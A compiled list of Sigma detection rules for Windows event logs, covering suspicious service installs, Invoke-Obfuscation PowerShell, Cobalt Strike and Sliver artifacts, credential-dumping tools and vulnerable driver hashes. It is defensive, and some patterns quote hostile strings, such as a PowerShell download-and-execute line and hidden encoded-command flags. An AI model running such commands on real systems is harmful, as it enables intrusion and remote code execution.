RTCore Suspicious Service Installation
- source: sigma
- technicques:
Description
Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse
Detection logic
condition: selection
selection:
EventID: 7045
Provider_Name: Service Control Manager
ServiceName: RTCore64
Invoke-Obfuscation COMPRESS OBFUSCATION - System
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated Powershell via COMPRESS OBFUSCATION
Detection logic
condition: selection
selection:
EventID: 7045
ImagePath|contains:
- :system.io.compression.deflatestream
- system.io.streamreader
ImagePath|contains|all:
- new-object
- text.encoding]::ascii
- readtoend
Provider_Name: Service Control Manager
Suspicious Service Installation Script
- source: sigma
- technicques:
- t1543
- t1543.003
Description
Detects suspicious service installation scripts
Detection logic
condition: all of selection_*
selection_binaries:
ImagePath|contains:
- cscript
- mshta
- powershell
- pwsh
- regsvr32
- rundll32
- wscript
selection_cmd_flags:
ImagePath|contains|windash:
- ' -c '
- ' -r '
- ' -k '
selection_eid:
EventID: 7045
Provider_Name: Service Control Manager
Invoke-Obfuscation Obfuscated IEX Invocation - System
- source: sigma
- technicques:
- t1027
Description
Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references
Detection logic
condition: all of selection_*
selection_eid:
EventID: 7045
selection_imagepath:
- ImagePath|re: \$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[
- ImagePath|re: \$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[
- ImagePath|re: \$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[
- ImagePath|re: \$env:ComSpec\[(\s*\d{1,3}\s*,){2}
- ImagePath|re: \\*mdr\*\W\s*\)\.Name
- ImagePath|re: \$VerbosePreference\.ToString\(
- ImagePath|re: \String\]\s*\$VerbosePreference
Invoke-Obfuscation VAR+ Launcher - System
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated use of Environment Variables to execute PowerShell
Detection logic
condition: selection
selection:
EventID: 7045
ImagePath|contains:
- /c
- /r
ImagePath|contains|all:
- cmd
- '"set'
- -f
Provider_Name: Service Control Manager
Sliver C2 Default Service Installation
- source: sigma
- technicques:
- t1543
- t1543.003
- t1569
- t1569.002
Description
Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands
Detection logic
condition: selection_eid and 1 of selection_service_*
selection_eid:
EventID: 7045
Provider_Name: Service Control Manager
selection_service_1:
ImagePath|re: ^[a-zA-Z]:\\windows\\temp\\[a-zA-Z0-9]{10}\.exe
selection_service_2:
ServiceName:
- Sliver
- Sliver implant
Invoke-Obfuscation Via Use Clip - System
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated Powershell via use Clip.exe in Scripts
Detection logic
condition: selection
selection:
EventID: 7045
ImagePath|contains: (Clipboard|i
Provider_Name: Service Control Manager
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated Powershell via VAR++ LAUNCHER
Detection logic
condition: selection
selection:
EventID: 7045
ImagePath|contains:
- '{0}'
- '{1}'
- '{2}'
- '{3}'
- '{4}'
- '{5}'
ImagePath|contains|all:
- '&&set'
- cmd
- /c
- -f
Provider_Name: Service Control Manager
Invoke-Obfuscation CLIP+ Launcher - System
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated use of Clip.exe to execute PowerShell
Detection logic
condition: selection
selection:
EventID: 7045
ImagePath|contains|all:
- cmd
- '&&'
- 'clipboard]::'
Provider_Name: Service Control Manager
Service Installation with Suspicious Folder Pattern
- source: sigma
- technicques:
- t1543
- t1543.003
Description
Detects service installation with suspicious folder patterns
Detection logic
condition: all of selection_*
selection_eid:
EventID: 7045
Provider_Name: Service Control Manager
selection_img_paths:
- ImagePath|re: ^[Cc]:\\[Pp]rogram[Dd]ata\\.{1,9}\.exe
- ImagePath|re: ^[Cc]:\\.{1,9}\.exe
Invoke-Obfuscation Via Use MSHTA - System
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated Powershell via use MSHTA in Scripts
Detection logic
condition: selection
selection:
EventID: 7045
ImagePath|contains|all:
- mshta
- vbscript:createobject
Provider_Name: Service Control Manager
smbexec.py Service Installation
- source: sigma
- technicques:
- t1021
- t1021.002
- t1569
- t1569.002
Description
Detects the use of smbexec.py tool by detecting a specific service installation
Detection logic
condition: selection_eid and 1 of selection_service_*
selection_eid:
EventID: 7045
Provider_Name: Service Control Manager
selection_service_image:
ImagePath|contains:
- '.bat & del '
- __output 2^>^&1 >
selection_service_name:
ServiceName: BTOBTO
CobaltStrike Service Installations - System
- source: sigma
- technicques:
- t1021
- t1021.002
- t1543
- t1543.003
- t1569
- t1569.002
Description
Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement
Detection logic
condition: selection_id and (selection1 or selection2 or selection3 or selection4)
selection1:
ImagePath|contains|all:
- ADMIN$
- .exe
selection2:
ImagePath|contains|all:
- '%COMSPEC%'
- start
- powershell
selection3:
ImagePath|contains: powershell -nop -w hidden -encodedcommand
selection4:
ImagePath|base64offset|contains: 'IEX (New-Object Net.Webclient).DownloadString(''http://127.0.0.1:'
selection_id:
EventID: 7045
Provider_Name: Service Control Manager
PAExec Service Installation
- source: sigma
- technicques:
- t1569
- t1569.002
Description
Detects PAExec service installation
Detection logic
condition: all of selection_*
selection_eid:
EventID: 7045
Provider_Name: Service Control Manager
selection_image:
- ServiceName|startswith: PAExec-
- ImagePath|startswith: C:\WINDOWS\PAExec-
Invoke-Obfuscation STDIN+ Launcher - System
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated use of stdin to execute PowerShell
Detection logic
condition: all of selection_*
selection_main:
EventID: 7045
ImagePath|contains:
- /c
- /r
ImagePath|contains|all:
- cmd
- powershell
Provider_Name: Service Control Manager
selection_other:
- ImagePath|contains: noexit
- ImagePath|contains|all:
- input
- $
PsExec Service Installation
- source: sigma
- technicques:
- t1569
- t1569.002
Description
Detects PsExec service installation and execution events
Detection logic
condition: all of selection_*
selection_eid:
EventID: 7045
Provider_Name: Service Control Manager
selection_service:
- ServiceName: PSEXESVC
- ImagePath|endswith: \PSEXESVC.exe
Moriya Rootkit - System
- source: sigma
- technicques:
- t1543
- t1543.003
Description
Detects the use of Moriya rootkit as described in the securelist’s Operation TunnelSnake report
Detection logic
condition: selection
selection:
EventID: 7045
Provider_Name: Service Control Manager
ServiceName: ZzNetSvc
Invoke-Obfuscation Via Use Rundll32 - System
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated Powershell via use Rundll32 in Scripts
Detection logic
condition: selection
selection:
EventID: 7045
ImagePath|contains:
- value
- invoke
- comspec
- iex
ImagePath|contains|all:
- '&&'
- rundll32
- shell32.dll
- shellexec_rundll
Provider_Name: Service Control Manager
Remote Access Tool Services Have Been Installed - System
- source: sigma
- technicques:
- t1543
- t1543.003
- t1569
- t1569.002
Description
Detects service installation of different remote access tools software. These software are often abused by threat actors to perform
Detection logic
condition: selection
selection:
EventID:
- 7045
- 7036
Provider_Name: Service Control Manager
ServiceName|contains:
- AmmyyAdmin
- Atera
- BASupportExpressSrvcUpdater
- BASupportExpressStandaloneService
- chromoting
- GoToAssist
- GoToMyPC
- jumpcloud
- LMIGuardianSvc
- LogMeIn
- monblanking
- Parsec
- RManService
- RPCPerformanceService
- RPCService
- SplashtopRemoteService
- SSUService
- TeamViewer
- TightVNC
- vncserver
- Zoho
HackTool Service Registration or Execution
- source: sigma
- technicques:
- t1569
- t1569.002
Description
Detects installation or execution of services
Detection logic
condition: selection_eid and 1 of selection_service_*
selection_eid:
EventID:
- 7045
- 7036
Provider_Name: Service Control Manager
selection_service_image:
ImagePath|contains: bypass
selection_service_name:
ServiceName|contains:
- cachedump
- DumpSvc
- gsecdump
- pwdump
- UACBypassedService
- WCE SERVICE
- WCESERVICE
- winexesvc
KrbRelayUp Service Installation
- source: sigma
- technicques:
- t1543
Description
Detects service creation from KrbRelayUp tool used for privilege escalation in Windows domain environments where LDAP signing is not enforced (the default settings)
Detection logic
condition: selection
selection:
EventID: 7045
ServiceName: KrbSCM
RemCom Service Installation
- source: sigma
- technicques:
- t1569
- t1569.002
Description
Detects RemCom service installation and execution events
Detection logic
condition: all of selection_*
selection_eid:
EventID: 7045
Provider_Name: Service Control Manager
selection_service:
- ServiceName: RemComSvc
- ImagePath|endswith: \RemComSvc.exe
PowerShell Scripts Installed as Services
- source: sigma
- technicques:
- t1569
- t1569.002
Description
Detects powershell script installed as a Service
Detection logic
condition: selection
selection:
EventID: 7045
ImagePath|contains:
- powershell
- pwsh
Provider_Name: Service Control Manager
Service Installation in Suspicious Folder
- source: sigma
- technicques:
- t1543
- t1543.003
Description
Detects service installation in suspicious folder appdata
Detection logic
condition: selection and not 1 of filter_optional_*
filter_optional_zoom:
ImagePath|contains: :\Program Files\Common Files\Zoom\Support\CptService.exe
ServiceName: Zoom Sharing Service
selection:
EventID: 7045
ImagePath|contains:
- \AppData\
- \\\\127.0.0.1
- \\\\localhost
Provider_Name: Service Control Manager
No Suitable Encryption Key Found For Generating Kerberos Ticket
- source: sigma
- technicques:
- t1558
- t1558.003
Description
Detects errors when a target server doesn’t have suitable keys for generating kerberos tickets. This issue can occur for example when a service uses a user account or a computer account that is configured for only DES encryption on a computer that is running Windows 7 which has DES encryption for Kerberos authentication disabled.
Detection logic
condition: selection
selection:
EventID:
- 16
- 27
Provider_Name: Microsoft-Windows-Kerberos-Key-Distribution-Center
KDC RC4-HMAC Downgrade CVE-2022-37966
- source: sigma
- technicques:
Description
Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation
Detection logic
condition: selection
selection:
EventID: 42
Level: 2
Provider_Name: Kerberos-Key-Distribution-Center
Windows Update Error
- source: sigma
- technicques:
- t1584
Description
Detects Windows update errors including installation failures and connection issues. Defenders should observe this in case critical update KBs aren’t installed.
Detection logic
condition: selection
selection:
EventID:
- 16
- 20
- 24
- 213
- 217
Provider_Name: Microsoft-Windows-WindowsUpdateClient
DHCP Server Error Failed Loading the CallOut DLL
- source: sigma
- technicques:
- t1574
- t1574.002
Description
This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded
Detection logic
condition: selection
selection:
EventID:
- 1031
- 1032
- 1034
Provider_Name: Microsoft-Windows-DHCP-Server
DHCP Server Loaded the CallOut DLL
- source: sigma
- technicques:
- t1574
- t1574.002
Description
This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded
Detection logic
condition: selection
selection:
EventID: 1033
Provider_Name: Microsoft-Windows-DHCP-Server
Local Privilege Escalation Indicator TabTip
- source: sigma
- technicques:
- t1557
- t1557.001
Description
Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode
Detection logic
condition: selection
selection:
EventID: 10001
Provider_Name: Microsoft-Windows-DistributedCOM
param1: C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe
param2: 2147943140
param3: '{054AAE20-4BEA-4347-8A35-64A533254A9D}'
Critical Hive In Suspicious Location Access Bits Cleared
- source: sigma
- technicques:
- t1003
- t1003.002
Description
Detects events from the Kernel-General ETW indicating that the access bits of a hive with a system like hive name located in the temp directory have been reset. This occurs when an application tries to access a hive and the hive has not be recognized since the last 7 days (by default). Registry hive dumping utilities such as QuarksPwDump were seen emitting this behavior.
Detection logic
condition: selection
selection:
EventID: 16
HiveName|contains:
- \Temp\SAM
- \Temp\SECURITY
Provider_Name: Microsoft-Windows-Kernel-General
Sysmon Application Crashed
- source: sigma
- technicques:
- t1562
Description
Detects application popup reporting a failure of the Sysmon service
Detection logic
condition: selection
selection:
Caption:
- sysmon64.exe - Application Error
- sysmon.exe - Application Error
EventID: 26
Provider_Name: Application Popup
Vulnerable Netlogon Secure Channel Connection Allowed
- source: sigma
- technicques:
- t1548
Description
Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.
Detection logic
condition: selection
selection:
EventID: 5829
Provider_Name: NetLogon
Exchange Set OabVirtualDirectory ExternalUrl Property
- source: sigma
- technicques:
- t1505
- t1505.003
Description
Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log
Detection logic
condition: keywords
keywords:
'|all':
- Set-OabVirtualDirectory
- ExternalUrl
- Page_Load
- script
Remove Exported Mailbox from Exchange Webserver
- source: sigma
- technicques:
- t1070
Description
Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit
Detection logic
condition: keywords
keywords:
'|all':
- Remove-MailboxExportRequest
- ' -Identity '
- ' -Confirm "False"'
Suspicious Digital Signature Of AppX Package
- source: sigma
- technicques:
Description
Detects execution of AppX packages with known suspicious or malicious signature
Detection logic
condition: selection
selection:
EventID: 157
subjectName: CN=Foresee Consulting Inc., O=Foresee Consulting Inc., L=North York,
S=Ontario, C=CA, SERIALNUMBER=1004913-1, OID.1.3.6.1.4.1.311.60.2.1.3=CA, OID.2.5.4.15=Private
Organization
Ngrok Usage with Remote Desktop Service
- source: sigma
- technicques:
- t1090
Description
Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour
Detection logic
condition: selection
selection:
Address|contains: '16777216'
EventID: 21
Suspicious Cobalt Strike DNS Beaconing - DNS Client
- source: sigma
- technicques:
- t1071
- t1071.004
Description
Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons
Detection logic
condition: selection_eid and 1 of selection_query_*
selection_eid:
EventID: 3008
selection_query_1:
QueryName|startswith:
- aaa.stage.
- post.1
selection_query_2:
QueryName|contains: .stage.123456.
Unsigned Binary Loaded From Suspicious Location
- source: sigma
- technicques:
- t1574
- t1574.002
Description
Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations
Detection logic
condition: selection
selection:
EventID:
- 11
- 12
ImageName|contains:
- \Users\Public\
- \PerfLogs\
- \Desktop\
- \Downloads\
- \AppData\Local\Temp\
- C:\Windows\TEMP\
Microsoft Defender Blocked from Loading Unsigned DLL
- source: sigma
- technicques:
- t1574
- t1574.002
Description
Detects Code Integrity (CI) engine blocking Microsoft Defender’s processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL
Detection logic
condition: selection
selection:
EventID:
- 11
- 12
ProcessPath|endswith:
- \MpCmdRun.exe
- \NisSrv.exe
DNS Server Error Failed Loading the ServerLevelPluginDLL
- source: sigma
- technicques:
- t1574
- t1574.002
Description
Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded
Detection logic
condition: selection
selection:
EventID:
- 150
- 770
- 771
Important Scheduled Task Deleted
- source: sigma
- technicques:
- t1489
Description
Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities
Detection logic
condition: selection and not filter
filter:
UserName|contains:
- AUTHORI
- AUTORI
selection:
EventID: 141
TaskName|contains:
- \Windows\SystemRestore\SR
- \Windows\Windows Defender\
- \Windows\BitLocker
- \Windows\WindowsBackup\
- \Windows\WindowsUpdate\
- \Windows\UpdateOrchestrator\
- \Windows\ExploitGuard
Scheduled Task Executed From A Suspicious Location
- source: sigma
- technicques:
- t1053
- t1053.005
Description
Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it’s an unusale program to be run from a Scheduled Task
Detection logic
condition: selection
selection:
EventID: 129
Path|contains:
- C:\Windows\Temp\
- \AppData\Local\Temp\
- \Desktop\
- \Downloads\
- \Users\Public\
- C:\Temp\
Backup Catalog Deleted
- source: sigma
- technicques:
- t1070
- t1070.004
Description
Detects backup catalog deletions
Detection logic
condition: selection
selection:
EventID: 524
Provider_Name: Microsoft-Windows-Backup
MSSQL XPCmdshell Suspicious Execution
- source: sigma
- technicques:
Description
Detects when the MSSQL “xp_cmdshell” stored procedure is used to execute commands
Detection logic
condition: selection
selection:
Data|contains|all:
- object_name:xp_cmdshell
- statement:EXEC
EventID: 33205
Provider_Name: MSSQLSERVER
MSSQL Server Failed Logon From External Network
- source: sigma
- technicques:
- t1110
Description
Detects failed logon attempts from clients with external network IP to an MSSQL server. This can be a sign of a bruteforce attack.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_local_ips:
Data|contains:
- 'CLIENT: 10.'
- 'CLIENT: 172.16.'
- 'CLIENT: 172.17.'
- 'CLIENT: 172.18.'
- 'CLIENT: 172.19.'
- 'CLIENT: 172.20.'
- 'CLIENT: 172.21.'
- 'CLIENT: 172.22.'
- 'CLIENT: 172.23.'
- 'CLIENT: 172.24.'
- 'CLIENT: 172.25.'
- 'CLIENT: 172.26.'
- 'CLIENT: 172.27.'
- 'CLIENT: 172.28.'
- 'CLIENT: 172.29.'
- 'CLIENT: 172.30.'
- 'CLIENT: 172.31.'
- 'CLIENT: 192.168.'
- 'CLIENT: 127.'
- 'CLIENT: 169.254.'
selection:
EventID: 18456
Provider_Name: MSSQLSERVER
Audit CVE Event
- source: sigma
- technicques:
- t1068
- t1203
- t1210
- t1211
- t1212
- t1499
- t1499.004
Description
Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited. MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability. Unfortunately, that is about the only instance of CVEs being written to this log.
Detection logic
condition: selection
selection:
EventID: 1
Provider_Name:
- Microsoft-Windows-Audit-CVE
- Audit-CVE
Application Uninstalled
- source: sigma
- technicques:
- t1489
Description
An application has been removed. Check if it is critical.
Detection logic
condition: selection
selection:
EventID:
- 1034
- 11724
Provider_Name: MsiInstaller
MSI Installation From Web
- source: sigma
- technicques:
- t1218
- t1218.007
Description
Detects installation of a remote msi file from web.
Detection logic
condition: selection
selection:
Data|contains: ://
EventID:
- 1040
- 1042
Provider_Name: MsiInstaller
Restricted Software Access By SRP
- source: sigma
- technicques:
- t1072
Description
Detects restricted access to applications by the Software Restriction Policies (SRP) policy
Detection logic
condition: selection
selection:
EventID:
- 865
- 866
- 867
- 868
- 882
Provider_Name: Microsoft-Windows-SoftwareRestrictionPolicies
DNS Query Request By Regsvr32.EXE
- source: sigma
- technicques:
- t1218
- t1218.010
- t1559
- t1559.001
Description
Detects DNS queries initiated by “Regsvr32.exe”
Detection logic
condition: selection
selection:
Image|endswith: \regsvr32.exe
DNS Query Tor .Onion Address - Sysmon
- source: sigma
- technicques:
- t1090
- t1090.003
Description
Detects DNS queries to an “.onion” address related to Tor routing networks
Detection logic
condition: selection
selection:
QueryName|contains: .onion
AppX Package Installation Attempts Via AppInstaller.EXE
- source: sigma
- technicques:
- t1105
Description
Detects DNS queries made by “AppInstaller.EXE”. The AppInstaller is the default handler for the “ms-appinstaller” URI. It attempts to load/install a package from the referenced URL
Detection logic
condition: selection
selection:
Image|endswith: \AppInstaller.exe
Image|startswith: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_
Suspicious Cobalt Strike DNS Beaconing - Sysmon
- source: sigma
- technicques:
- t1071
- t1071.004
Description
Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons
Detection logic
condition: 1 of selection*
selection1:
QueryName|startswith:
- aaa.stage.
- post.1
selection2:
QueryName|contains: .stage.123456.
Vulnerable WinRing0 Driver Load
- source: sigma
- technicques:
- t1543
- t1543.003
Description
Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation
Detection logic
condition: 1 of selection*
selection_name:
ImageLoaded|endswith:
- \WinRing0x64.sys
- \WinRing0.sys
- \WinRing0.dll
- \WinRing0x64.dll
- \winring00x64.sys
selection_other:
Imphash: d41fa95d4642dc981f10de36f4dc8cd7
selection_sysmon:
Hashes|contains: IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7
Vulnerable Driver Load
- source: sigma
- technicques:
- t1068
- t1543
- t1543.003
Description
Detects loading of known vulnerable drivers via their hash.
Detection logic
condition: selection
selection:
Hashes|contains:
- MD5=c996d7971c49252c582171d9380360f2
- MD5=da7e98b23b49b7293ee06713032c74f6
- MD5=9496585198d726000ea505abc39dbfe9
- MD5=649ff59b8e571c1fc6535b31662407aa
- MD5=4429f85e2415742c7cf8c9f54905c4b9
- MD5=a610cd4c762b5af8575285dafb9baa8f
- MD5=d5e76d125d624f8025d534f49e3c4162
- MD5=9c8fffef24fc480917236f9a20b80a47
- MD5=65b979bcab915c3922578fe77953d789
- MD5=598f8fb2317350e5f90b7bd16baf5738
- MD5=6691e873354f1914692df104718eebad
- MD5=4814205270caa80d35569eee8081838e
- MD5=7f9128654c3def08c28e0e13efff0fee
- MD5=ce952204558ea66ec1a9632dcbdde8bd
- MD5=0c0195c48b6b8582fa6f6373032118da
- MD5=370a4ca29a7cf1d6bc0744afc12b236c
- MD5=67e03f83c503c3f11843942df32efe5a
- MD5=8a70921638ff82bb924456deadcd20e6
- MD5=8a212a246b3c41f3ddce5888aaaaacd6
- MD5=a346417e9ae2c17a8fbf73302eeb611d
- MD5=d4f7c14e92b36c341c41ae93159407dd
- MD5=748cf64b95ca83abc35762ad2c25458f
- MD5=79ab228766c76cfdf42a64722821711e
- MD5=ce67e51b8c0370d1bfe421b79fa8b656
- MD5=25190f667f31318dd9a2e36383d5709f
- MD5=1f263a57c5ef46c8577744ecb32c9548
- MD5=c6cfa2d6e4c443e673c2c12417ea3001
- MD5=cceb3a7e3bd0203c807168b393a65a74
- MD5=56b54823a79a53747cbe11f8c4db7b1e
- MD5=988dabdcf990b134b0ac1e00512c30c4
- MD5=09e77d71d626574e6142894caca6e6dd
- MD5=c832a4313ff082258240b61b88efa025
- MD5=44499d3cab387aa78a4a6eca2ac181fb
- MD5=6ff59faea912903af0ba8e80e58612bc
- MD5=7461f0f9b931044a9d5f1d44eb4e8e09
- MD5=08bac71557df8a9b1381c8c165f64520
- MD5=fea9319d67177ed6f36438d2bd9392fb
- MD5=6dd82d91f981893be57ff90101a7f7f1
- MD5=d4119a5cb07ce945c6549eae74e39731
- MD5=cf1113723e3c1c71af80d228f040c198
- MD5=0e625b7a7c3f75524e307b160f8db337
- MD5=6e1faeee0ebfcb384208772410fe1e86
- MD5=58a92520dda53166e322118ee0503364
- MD5=916ba55fc004b85939ee0cc86a5191c5
- MD5=f16b44cca74d3c3645e4c0a6bb5c0cb9
- MD5=db2fc89098ac722dabe3c37ed23de340
- MD5=6f5cf7feb9bb8108b68f169b8e625ffe
- MD5=d2588631d8aae2a3e54410eaf54f0679
- MD5=72acbdd8fac58b71b301980eab3ebfc8
- MD5=9cc757a18b86408efc1ce3ed20cbcdac
- MD5=230fd3749904ca045ea5ec0aa14006e9
- MD5=79329e2917623181888605bc5b302711
- MD5=3e4a1384a27013ab7b767a88b8a1bd34
- MD5=bafd6bad121e42f940a0b8abc587eadf
- MD5=02a1d77ef13bd41cad04abcce896d0b9
- MD5=de331f863627dc489f547725d7292bbd
- MD5=29122f970a9e766ef01a73e0616d68b3
- MD5=2b8814cff6351c2b775387770053bdec
- MD5=332db70d2c5c332768ab063ba6ac8433
- MD5=40f39a98fb513411dacdfc5b2d972206
- MD5=644d687c9f96c82ea2974ccacd8cd549
- MD5=825703c494e0d270f797f1ecf070f698
- MD5=afae2a21e36158f5cf4f76f896649c75
- MD5=dd050e79c515e4a6d1ae36cac5545025
- MD5=6133e1008f8c6fc32d4b1a60941bab85
- MD5=0e2fc7e7f85c980eb698b9e468c20366
- MD5=94c80490b02cc655d2d80597c3aef08f
- MD5=4d487f77be4471900d6ccbc47242cc25
- MD5=2e3dbb01b282a526bdc3031e0663c41c
- MD5=93a23503e26773c27ed1da06bb79e7a4
- MD5=ffd0c87d9bf894af26823fbde94c71b6
- MD5=a86150f2e29b35369afa2cafd7aa9764
- MD5=6126065af2fc2639473d12ee3c0c198e
- MD5=c1d3a6bb423739a5e781f7eee04c9cfd
- MD5=f0db5af13c457a299a64cf524c64b042
- MD5=e5e8ecb20bc5630414707295327d755e
- MD5=659a59d7e26b7730361244e12201378e
- MD5=8f47af49c330c9fcf3451ad2252b9e04
- MD5=dd9596c18818288845423c68f3f39800
- MD5=a7d3ebfb3843ee28d9ca18b496bd0eb2
- MD5=20125794b807116617d43f02b616e092
- MD5=46cae59443ae41f4dbb42e050a9b501a
- MD5=21e13f2cb269defeae5e1d09887d47bb
- MD5=5bab40019419a2713298a5c9173e5d30
- MD5=7314c2bc19c6608d511ef36e17a12c98
- MD5=24061b0958874c1cb2a5a8e9d25482d4
- MD5=31a4631d77b2357ac9618e2a60021f11
- MD5=130c5aec46bdec8d534df7222d160fdb
- MD5=592065b29131af32aa18a9e546be9617
- MD5=2d64d681d79e0d26650928259530c075
- MD5=1ce19950e23c975f677b80ff59d04fae
- MD5=318e309e11199ec69d8928c46a4d901b
- MD5=d78a29306f42d42cd48ad6bc6c6a7602
- MD5=6a094d8e4b00dd1d93eb494099e98478
- MD5=0be80db5d9368fdb29fe9d9bfdd02e7c
- MD5=ba23266992ad964eff6d358d946b76bd
- MD5=560069dc51d3cc7f9cf1f4e940f93cae
- MD5=a785b3bc4309d2eb111911c1b55e793f
- MD5=ac591a3b4df82a589edbb236263ec70a
- MD5=a664904f69756834049e9e272abb6fea
- MD5=19f32bf24b725f103f49dc3fa2f4f0bd
- MD5=2509a71a02296aa65a3428ddfac22180
- MD5=9988fc825675d4d3e2298537fc78e303
- MD5=dab9142dc12480bb39f25c9911df6c6c
- MD5=2c47725db0c5eb5c2ecc32ff208bceb6
- MD5=bdfe1f0346c066971e1f3d96f7fdaa2c
- MD5=7644bed8b74dc294ac77bf406df8ad77
- MD5=9ade14e58996a6abbfe2409d6cddba6a
- MD5=5212e0957468d3f94d90fa7a0f06b58f
- MD5=96e10a2904fff9491762a4fb549ad580
- MD5=0c55128c301921ce71991a6d546756ad
- MD5=97e90c869b5b0f493b833710931c39ed
- MD5=f36b8094c2fbf57f99870bfaeeacb25c
- MD5=b3d6378185356326fd8ee4329b0b7698
- MD5=9321a61a25c7961d9f36852ecaa86f55
- MD5=f758e7d53184faab5bc51f751937fa36
- MD5=1f7b2a00fe0c55d17d1b04c5e0507970
- MD5=239224202ccdea1f09813a70be8413ee
- MD5=996ded363410dfd38af50c76bd5b4fbc
- MD5=0fc2653b1c45f08ca0abd1eb7772e3c0
- MD5=79b8119b012352d255961e76605567d6
- MD5=2e1f8a2a80221deb93496a861693c565
- MD5=697bbd86ee1d386ae1e99759b1e38919
- MD5=ddc2ffe0ab3fcd48db898ab13c38d88d
- MD5=2971d4ee95f640d2818e38d8877c8984
- MD5=962a33a191dbe56915fd196e3a868cf0
- MD5=7575b35fee4ec8dbd0a61dbca3b972e3
- MD5=2d7f1c02b94d6f0f3e10107e5ea8e141
- MD5=057ec65bac5e786affeb97c0a0d1db15
- MD5=483abeee17e4e30a760ec8c0d6d31d6d
- MD5=f23b2adcfab58e33872e5c2d0041ad88
- MD5=2601cf769ad6ffee727997679693f774
- MD5=b4598c05d5440250633e25933fff42b0
- MD5=2e5f016ff9378be41fe98fa62f99b12d
- MD5=75d6c3469347de1cdfa3b1b9f1544208
- MD5=828bb9cb1dd449cd65a29b18ec46055f
- MD5=1bd38ac06ef8709ad23af666622609c9
- MD5=e747f164fc89566f934f9ec5627cd8c3
- MD5=a01c412699b6f21645b2885c2bae4454
- MD5=a216803d691d92acc44ac77d981aa767
- MD5=112b4a6d8c205c1287c66ad0009c3226
- MD5=68dde686d6999ad2e5d182b20403240b
- MD5=2d854c6772f0daa8d1fde4168d26c36b
- MD5=9a9dbf5107848c254381be67a4c1b1dd
- MD5=3ecd3ca61ffc54b0d93f8b19161b83da
- MD5=1ad400766530669d14a077514599e7f3
- MD5=4f27c09cc8680e06b04d6a9c34ca1e08
- MD5=eaea9ccb40c82af8f3867cd0f4dd5e9d
- MD5=043d5a1fc66662a3f91b8a9c027f9be9
- MD5=a0e2223868b6133c5712ba5ed20c3e8a
- MD5=2b3e0db4f00d4b3d0b4d178234b02e72
- MD5=1610342659cb8eb4a0361dbc047a2221
- MD5=c842827d4704a5ef53a809463254e1cc
- MD5=bf2a954160cb155df0df433929e9102b
- MD5=81b72492d45982cd7a4a138676329fd6
- MD5=2a2867e1f323320fdeef40c1da578a9a
- MD5=b3f132ce34207b7be899f4978276b66d
- MD5=3247014ba35d406475311a2eab0c4657
- MD5=88d5fc86f0dd3a8b42463f8d5503a570
- MD5=0be5c6476dd58072c93af4fca62ee4b3
- MD5=3cf7a55ec897cc938aebb8161cb8e74f
- MD5=931d4f01b5a88027ef86437f1b862000
- MD5=d253c19194a18030296ae62a10821640
- MD5=c5f5d109f11aadebae94c77b27cb026f
- MD5=15dd3ef7df34f9b464e9b38c2deb0793
- MD5=e913a51f66e380837ffe8da6707d4cc4
- MD5=c552dae8eaadd708a38704e8d62cf64d
- MD5=1f8a9619ab644728ce4cf86f3ad879ea
- MD5=f7edd110de10f9a50c2922f1450819aa
- MD5=be17a598e0f5314748ade0871ad343e7
- MD5=aa1ed3917928f04d97d8a217fe9b5cb1
- MD5=880686bceaf66bfde3c80569eb1ebfa7
- MD5=bc1eeb4993a601e6f7776233028ac095
- MD5=9ab9f3b75a2eb87fafb1b7361be9dfb3
- MD5=3a1ba5cd653a9ddce30c58e7c8ae28ae
- MD5=5054083cf29649a76c94658ba7ff5bce
- MD5=dedd07993780d973c22c93e77ab69fa3
- MD5=3aacaa62758fa6d178043d78ba89bebc
- MD5=f1a203406a680cc7e4017844b129dcbf
- MD5=2399e6f7f868d05623be03a616b4811e
- MD5=0d5774527af6e30905317839686b449d
- MD5=5bbe4e52bd33f1cdd4cf38c7c65f80ae
- MD5=047c06d4d38ea443c9af23a501c4480d
